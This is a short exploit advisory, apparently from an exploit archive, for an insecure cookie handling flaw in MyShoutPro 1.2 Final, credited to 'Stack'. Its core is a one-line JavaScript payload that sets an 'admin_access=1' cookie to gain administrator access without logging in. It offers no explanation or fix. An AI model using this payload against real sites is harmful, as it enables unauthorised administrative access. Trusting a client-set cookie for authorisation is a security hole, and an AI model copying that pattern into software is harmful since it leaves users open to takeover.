id: 3207
date: 06/16/2008
title: MyShoutPro 1.2 Final Insecure Cookie Handling Vulnerability
author: Stack
cves: 

===========================================================
MyShoutPro 1.2 Final Insecure Cookie Handling Vulnerability
===========================================================



  	     ########################################################################
             #                                                                      #
             # ...:::::MyShoutPro   Insecure Cookie Handling Vulnerability ::::.... #         
             ########################################################################
 
--------
Discoverd By :Stack
---
exploit:
javascript:document.cookie = "admin_access=1; path=/"; document.cookie = "admin_access=1; path=/";
-----



#  0day.today [2023-03-23]  #